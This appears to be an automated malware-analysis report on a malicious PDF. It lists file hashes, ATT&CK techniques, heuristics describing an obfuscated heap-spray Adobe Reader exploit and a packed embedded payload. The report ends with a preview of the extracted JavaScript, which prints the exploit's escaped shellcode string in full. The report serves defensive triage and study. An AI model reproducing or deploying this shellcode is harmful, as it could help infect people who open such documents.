Malicious PDF — malware analysis report

Static analysis result for SHA-256 f5d15c807aa0b644…

Verdict: MALICIOUS
File type: PDF
Size: 1.17 MB
Created: 2009-12-17 03:14:38 +08:00
Authoring application: PScript5.dll Version 5.2 (via Acrobat Distiller 7.0.5 (Windows))
First seen: 2026-05-11
MD5: f146aba17a27aca927c152765353338d
SHA-1: 950963e9c9fe3ff3a92bec37ebd3df3c51e9aaed
SHA-256: f5d15c807aa0b6442564ef0856d54cb0b399c84c7c757a653721a98581661a6b
Risk score: 120

Malware Insights

MITRE ATT&CK
  • T1059.001 PowerShell
  • T1204.002 Malicious File

The PDF file was flagged as malicious by an ML classifier. It contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The embedded JavaScript stream, named 'javascript_obj0031_000.js', is the primary indicator of malicious activity. This script is likely responsible for downloading and executing a second-stage payload, a common technique for malware delivery. No specific family could be identified.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9980

Heuristics (7)

  • JavaScript action (severity: low; 2 related findings; rule PDF_JAVASCRIPT)
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Obfuscated multi-stage PDF JavaScript heap-spray exploit (severity: critical; CVE related; rule PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAY)
    PDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
  • Embedded JS stream (severity: low; rule PDF_JS)
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded file (severity: low; rule PDF_EMBEDDED)
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload.
  • Object number defined twice with different bodies (severity: info; rule PDF_DUPLICATE_OBJ_BODY_INCREMENTAL)
    The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
  • Suspicious extracted artifact (severity: info; rule EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (severity: info; rule EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs found in PDF document text:
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#
    • http://ns.adobe.com/pdf/1.3/
    • http://ns.adobe.com/xap/1.0/
    • http://purl.org/dc/elements/1.1/
    • http://ns.adobe.com/xap/1.0/mm/

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: k1
Kind: pdf-embedded-file
Source: PDF EmbeddedFile object 26 at offset 0x1EC1
Size: 1206312 bytes
SHA-256: d5005e6ee2e649716afeda73fc5624d60ddac2ec2e3497a03f11116991a6a4e7
Detection: ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 8.00, consistent with packed or encrypted content.

Filename: javascript_obj0031_000.js
Kind: pdf-javascript-stream
Source: PDF /JS object 31 at offset 0x12B202
Size: 5453 bytes
SHA-256: da46c4b5a4e5867d625e812e2353d3a49369f70c04e256659909fa6c257adb63
Script preview (first 1,000 lines of the extracted script):
function start() 
{
  sc = UnEscApeYGVtffRDXedcTGByhn("\x25\x759090%u9090%u9090%ueb90%u5e18%u5b56%u068a%u303c%u1474%u6b66\x25\x7558c0"+
"\x25\x758a46%u3226%u88c4%u4303%ueb46%ue8eb%uffe3\x25\x75ffff"+
"%u5942%u4b43%u5941%u5841%u5841%u4646%u6b41%u7042%u6c43%u4b48%u4843%u6841"+
"%u4b48%u4843%u5441%u4b48%u7843%u4441%u6d48%u4b48%u4843%u5041%u5643%u7342"+
"%u6d48%u5843%u5a43%u5842%u5541%u5841%u5841%u5841%u4948%u6744%u4348%u7442"+
"%u5041%u4348%u7742%u6444%u6341%u4142%u6546%u5445%u7342%u6843%u4b48%u6443"+
"%u4444%u4444%u4b48%u4d43%u6441%u4b48%u4446%u7041%u7043%u6344%u6542%u4b48"+
"%u4243%u7844%u4b48%u5243%u7841%u6344%u6d42%u5342%u6c41%u4143%u4b48%u6c41"+
"%u4b48%u6344%u4542%u6b41%u4f42%u6b41%u7042%u4c42%u6c48%u4448%u7042%u6446"+
"%u6744%u7142%u7745%u5541%u6344%u4842%u5345%u4442%u6341%u7443%u4444%u7041"+
"%u6546%u5142%u4b48%u5243%u4444%u6344%u6d42%u6e43%u4b48%u5441%u4343%u4b48"+
"%u5243%u4441%u6344%u6d42%u4b48%u6444%u4b48%u6344%u7542%u4948%u4c43%u4444"+
"%u4441%u6943%u7342%u7742%u4d43%u6c43%u5841%u5841%u5841%u5841%u6243%u5841"+
"%u4d48%u4d43%u5443%u5843%u7846%u5841%u6444%u5841%u5841%u4f42%u6546%u6441"+
"%u4f42%u6546%u5846%u4f42%u4546%u7844%u6b41%u7942%u6e43%u4b48%u4543%u5443"+
"%u4b48%u7543%u6441%u4b48%u4742%u7348%u5942%u7248%u7742%u6c48%u6a41%u7342"+
"%u6a41%u7242%u6a48%u4e42%u7345%u4e42%u7a42%u5242%u4442%u6243%u5841%u4d48"+
"%u4d43%u6843%u5843%u4f42%u6546%u5443%u4b48%u4546%u6441%u5a43%u4f42%u6546"+
"%u4443%u4f42%u4546%u4441%u4b48%u4546%u6843%u7141%u4546%u5043%u4348%u7543"+
"%u5043%u5841%u7743%u7248%u4f42%u6546%u4443%u4f42%u4546%u5041%u7342%u4e48"+
"%u4643%u5641%u5445%u4348%u7948%u7548%u7043%u4b42%u5748%u4d42%u5741%u6b41"+
"%u7a42%u4a48%u5343%u4743%u6344%u7742%u774b%u6548%u4f41%u5841%u7443%u4e41"+
"%u6d43%u4a42%u4841%u4741%u7143%u5241%u5842%u6c48%u5041%u6a42%u6646%u6d48"+
"%u534b%u7543%u6f42%u5848%u4e42%u4a48%u5641%u5445%u5748%u6344%u5441%u5841"+
"%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841"+
"%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841"+
"%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u734b"+
"%u734b%u734b%u734b%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841"+
"%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u6446%u6d43%u6543%u7843%u7641"+
"%u6d43%u7043%u6d43%u5841%u5842%u5841%u5841%u5841%u5841%u5543%u4148%u5545"+
"%u6646%u5841%u5841%u5841%u5842%u6c48%u4e42%u4f42%u4f42%u4b48%u6845%u4b48"+
"%u4542%u4b48%u4e42%u4b48%u7645%u4348%u7142%u6841%u5842%u6f48%u4e42%u4f42"+
"%u4f42%u6b41%u7942%u4948%u4543%u5846%u4348%u4d43%u5846%u6444%u6b41%u7942"+
"%u5943%u4f42%u6546%u5846%u4f42%u4546%u4444%u6541%u484b%u7a48%u4a41%u5841"+
"%u7a43%u5445%u6541%u484b%u734b%u4a41%u5841%u6746%u5542%u7846%u4f42%u5841"+
"%u5841%u5841%u6243%u4843%u4f42%u4546%u7441%u4948%u4d43%u5844%u5843%u7846"+
"%u4f42%u5841%u5841%u5841%u4f42%u4546%u5441%u4b48%u7842%u4b48%u4d43%u5844"+
"%u6344%u7142%u4348%u5842%u6544%u7642%u5841%u5841%u4f42%u6546%u5844%u4f42"+
"%u4546%u4841%u6243%u5841%u6243%u5841%u7846%u5841%u4741%u5841%u5841%u4f42"+
"%u6546%u5846%u4f42%u4546%u7841%u6243%u5841%u4d48%u4d43%u5443%u5843%u6243"+
"%u6444%u4d48%u4d43%u4446%u5843%u4f42%u6546%u5846%u4f42%u4546%u7844%u6243"+
"%u5841%u6243%u5841%u7846%u4841%u4741%u5841%u5841%u4f42%u6546%u5846%u4f42"+
"%u4546%u7841%u4546%u6243%u5841%u7846%u484b%u5841%u5841%u5841%u6243%u5a41"+
"%u6243%u5841%u6243%u5941%u7846%u5841%u5841%u5841%u4843%u4d48%u4d43%u7846"+
"%u5843%u4348%u4d43%u4c41%u6544%u5345%u5241%u4b48%u4542%u4b48%u4f42%u4546"+
"%u4b48%u5445%u4f42%u6e43%u4c41%u5842%u4142%u4f42%u4f42%u4f42%u5543%u4348"+
"%u4842%u4f42%u6546%u5a41%u5345%u6141%u4948%u4d43%u4443%u7846%u5841%u6444"+
"%u5841%u5841%u6243%u4843%u4f42%u4546%u7441%u4948%u4d43%u6441%u4b48%u4d43"+
"%u4446%u4948%u4d43%u5043%u5842%u4243%u4e42%u4f42%u4f42%u4546%u6b41%u7942"+
"%u5943%u4d48%u4d43%u7846%u5843%u4348%u4d43%u7041%u6544%u5345%u5241%u4b48"+
"%u4542%u5048%u5048%u4546%u4b48%u5445%u4f42%u6e43%u7041%u5842%u4142%u4f42"+
"%u4f42%u4f42%u5543%u6243%u5841%u6243%u4f42%u4f42%u4546%u6444%u5048%u5048"+
"%u5048%u4546%u4b48%u5445%u4348%u7442%u4442%u6243%u4542%u5842%u4f48%u5841"+
"%u5841%u5841%u4948%u4d43%u4c42%u4f42%u6546%u5041%u5842%u4443%u5841%u5841"+
"%u5841%u4948%u4d43%u4442%u6243%u5841%u4d48%u4d43%u4842%u5843%u4f42%u6546"+
"%u4442%u4f42%u6546%u5041%u4f42%u6546%u4c42%u5842%u6346%u5841%u5841%u5841"+
"%u4b48%u4d43%u4842%u7942%u7242%u6444%u5841%u7445%u7445%u4546%u4b48%u5445"+
"%u4348%u7442%u4842%u6243%u4542%u5842%u4746%u5841%u5841%u5841%u4948%u4d43"+
"%u4c42%u4b48%u4543%u5041%u4b48%u4d43%u5441%u7142%u5042%u4841%u6e43%u4b48"+
"%u7142%u5843%u4f42%u6546%u4c42%u5842%u4343%u5841%u5841%u5841%u7942%u7242"+
"%u5041%u5841%u7445%u7445%u7445%u4546%u4b48%u5445%u4346%u4b48%u4d43%u5041"+
"%u4d48%u5843%u6344%u4b48%u7844%u4348%u7042%u6444%u4d48%u4b48%u4f42%u4e42"+
"%u4e42%u4e42%u4742%u6342%u4344%u7345%u4148%u5142%u484b%u484b%u484b%u484b"+
"%u6446%u5942%u4742%u7142%u484b%u484b%u5841%u5841%u6546%u6644%u7142%u5942"+
"%u4841%u4348%u7042%u5a41%u6845%u5142%u4341%u7242%u5343%u7942%u7242%u6444"+
"%u5841%u4f42%u4544%u6444%u7841%u4843%u5841%u4f42%u4544%u5041%u7841%u4843"+
"%u5841%u4f42%u4544%u5841%u7841%u4843%u5841%u5841%u5841%u5841%u5841%u5841"+
"%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841"+
"%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841"+
"%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841"+
"%u3030");
}